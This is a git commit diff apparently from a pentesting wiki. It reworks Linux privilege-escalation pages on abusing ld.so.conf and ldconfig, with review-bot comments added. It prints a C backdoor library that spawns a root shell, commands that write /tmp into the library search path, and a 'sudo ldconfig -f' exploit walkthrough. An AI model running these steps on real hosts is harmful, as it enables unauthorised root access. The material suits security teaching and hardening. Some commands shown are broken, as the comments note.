GitBook: [master] 3 pages modified

This commit is contained in:
CPol 2020-08-27 14:22:53 +00:00 committed by gitbook-bot
parent f1023f74c6
commit 1454af6b14
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
3 changed files with 46 additions and 50 deletions


@ -20,7 +20,7 @@
* [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md)
* [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md)
* [ld.so.conf example](linux-unix/privilege-escalation/ld.so.conf-example.md)
* [ld.so exploit example](linux-unix/privilege-escalation/ld.so.conf-example.md)
* [Escaping from a Docker container](linux-unix/privilege-escalation/escaping-from-a-docker-container.md)
* [Cisco - vmanage](linux-unix/privilege-escalation/cisco-vmanage.md)
* [D-Bus Enumeration & Command Injection Privilege Escalation](linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md)
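Review bot: only the link text changes here ("ld.so.conf example" to "ld.so exploit example") while the target path linux-unix/privilege-escalation/ld.so.conf-example.md stays the same, which matches the heading rename in ld.so.conf-example.md and keeps existing deep links working; if the file is later renamed to match the new title, this entry and the `{% page-ref page="ld.so.conf-example.md" %}` kept in the README must be updated together.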


@ -873,38 +873,6 @@ echo "Defaults !tty_tickets" > /etc/sudoers.d/win
echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win
```
### /etc/ld.so.conf.d/
If you can create a file in `/etc/ld.so.conf.d/` and you can execute **`ldconfig`**with root privileges \(sudo or suid\) then you can **make executable load arbitrary libraries**.
For example, to make executables in that system load libraries from _/tmp_ you can **create** in that folder a **config file** \(_test.conf_\) pointing to _/tmp_:
{% code title="/etc/ld.so.conf.d/test.conf" %}
```bash
/tmp
```
{% endcode %}
And when executing **`ldconfig`**all the **binaries inside the system will be able to load libraries** from _/tmp_.
So if there is a **binary** that **executes** a function called **`seclogin()`** from a **library** called **`libseclogin.so`** , you can create a backdoor in _/tmp_ and impersonate that libraries with that function:
{% code title="/tmp/libseclogin.so" %}
```c
#include <stdio.h>
//To compile: gcc -fPIC -shared -o libseclogin.so exploit.c
seclogin() {
setgid(0); setuid(0);
system("/bin/bash");
}
```
{% endcode %}
Note in the next image that \(_having already created the backdoor on /tmp_\) having the config file in _/etc/ld.so.conf.d_ pointing to _/tmp_ after using `ldconfig` the executable `myexec`stops loading the library from `/usr/lib` and loads it from _/tmp_:
![](../../.gitbook/assets/image%20%28101%29.png)
_This example was taken from the HTB machine: Dab._
### DOAS
There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
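Review bot: the removed `/etc/ld.so.conf.d/` section (the test.conf snippet, the libseclogin.so listing, the `image (101).png` screenshot and the "taken from the HTB machine: Dab" attribution) does not reappear in either of the other two files touched by this commit, so unless ld.so.conf-example.md already contains that material the worked example and its screenshot are dropped from the book; the image reference and the attribution should move with the text (the Dab reference does survive in the References list of ld.so.conf-example.md, so the attribution at least is preserved). The README keeps the `ld.so.conf-example.md` page-ref, so the cross-reference itself is intact.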
@ -915,26 +883,18 @@ permit nopass demo as root cmd vim
## Shared Library
#### ldconfig
### ld.so
Identify shared libraries with `ldd`
The file `/etc/ld.so.conf` indicates **where are loaded the configurations files from**. Typically, this file contains the following path: `include /etc/ld.so.conf.d/*.conf`
```text
$ ldd /opt/binary
linux-vdso.so.1 (0x00007ffe961cd000)
vulnlib.so.8 => /usr/lib/vulnlib.so.8 (0x00007fa55e55a000)
/lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000)
```
That means that the configuration files from `/etc/ld.so.conf.d/*.conf` will be read. This configuration files **points to another folders** where **libraries** are going to be **searched** for. For example, the content of `/etc/ld.so.conf.d/libc.conf` is `/usr/local/lib`. **This means that the system will search for libraries inside `/usr/local/lib`**.
Create a library in `/tmp` and activate the path.
If for some reason **a user has write permissions** on any of the paths indicated: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, any file inside `/etc/ld.so.conf.d/` or any folder indicated inside any config file inside `/etc/ld.so.conf.d/*.conf` he may be able to escalate privileges.
Take a look about **how to exploit this misconfiguration** in the following page:
```text
gcc Wall fPIC shared o vulnlib.so /tmp/vulnlib.c
echo "/tmp/" > /etc/ld.so.conf.d/exploit.conf && ldconfig -l /tmp/vulnlib.so
/opt/binary
```
{% page-ref page="ld.so.conf-example.md" %}
#### RPATH
### RPATH
```text
level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"
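Review bot: in the new ld.so section, "This configuration files points to another folders" should read "These configuration files point to other folders", and "Take a look about how to exploit" should be "Take a look at how to exploit". The compile line `gcc Wall fPIC shared o vulnlib.so /tmp/vulnlib.c` has lost the leading hyphen on every flag (`-Wall -fPIC -shared -o`) and will not compile as written; if that block is meant to survive the rewrite it should be corrected, otherwise dropping it in favour of the page-ref avoids shipping a broken command. Also the `ldd /opt/binary` block shows a `$` prompt while the second block has none, so command and output are indistinguishable there; one convention should be used for both.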


@ -1,4 +1,4 @@
# ld.so.conf example
# ld.so exploit example
## Prepare the environment
@ -111,9 +111,45 @@ ubuntu
Note that in this example we haven't escalated privileges, but modifying the commands executed and **waiting for root or other privileged user to execute the vulnerable binary** we will be able to escalate privileges.
{% endhint %}
### Other misconfigurations - Same vuln
In the previous example we faked a misconfiguration where an administrator **set a non-privileged folder inside a configuration file inside `/etc/ld.so.conf.d/`**.
But there are other misconfigurations that can cause the same vulnerability, if you have **write permissions** in some **config file** inside `/etc/ld.so.conf.d`s, in the folder `/etc/ld.so.conf.d` or in the file `/etc/ld.so.conf` you can configure the same vulnerability and exploit it.
## Exploit 2
**Suppose you have sudo privileges over `ldconfig`**.
You can indicate `ldconfig` **where to load the conf files from**, so we can take advantage of it to make `ldconfig` load arbitrary folders.
So, lets create the files and folders needed to load "/tmp":
```bash
cd /tmp
echo "include /tmp/conf/*" > fake.ld.so.conf
echo "/tmp" > conf/evil.conf
```
Now, as indicated in the **previous exploit**, **create the malicious library inside** _**/tmp**_.
And finally, lets load the path and check where is the binary loading the library from:
```bash
ldconfig -f fake.ld.so.conf
ldd sharedvuln
linux-vdso.so.1 => (0x00007fffa2dde000)
libcustom.so => /tmp/libcustom.so (0x00007fcb07756000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcb0738c000)
/lib64/ld-linux-x86-64.so.2 (0x00007fcb07958000)
```
**As you can see, having sudo privileges over `ldconfig` you can exploit the same vulnerability.**
{% hint style="info" %}
I **didn't find** a reliable way to exploit this vuln if `ldconfig` is configured with the **suid bit**. The following error appear: `/sbin/ldconfig.real: Can't create temporary cache file /etc/ld.so.cache~: Permission denied`
{% endhint %}
## References
* [https://www.boiteaklou.fr/Abusing-Shared-Libraries.html](https://www.boiteaklou.fr/Abusing-Shared-Libraries.html)
* [https://blog.pentesteracademy.com/abusing-missing-library-for-privilege-escalation-3-minute-read-296dcf81bec2](https://blog.pentesteracademy.com/abusing-missing-library-for-privilege-escalation-3-minute-read-296dcf81bec2)
* Dab machine in HTB
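Review bot: the setup block under "Exploit 2" never creates the `conf` directory, so `echo "/tmp" > conf/evil.conf` fails with "No such file or directory" as written; a `mkdir -p conf` line before it is needed for the listing to be reproducible. In the second block the `ldconfig -f fake.ld.so.conf` and `ldd sharedvuln` commands sit in the same bash fence as the ldd output with no prompt, so readers cannot tell command from output; either add `$` prompts or move the output into a text fence, as the README does. From a hardening standpoint the section would benefit from stating its conclusion plainly for administrators: a sudoers rule that grants `ldconfig`, with or without fixed arguments, is equivalent to granting root, because `-f` lets the caller pick the configuration file and therefore the library search path for every dynamically linked binary on the host, so such rules should be removed and `ldconfig` invocations with `-f` or `-C` are worth alerting on in sudo logs.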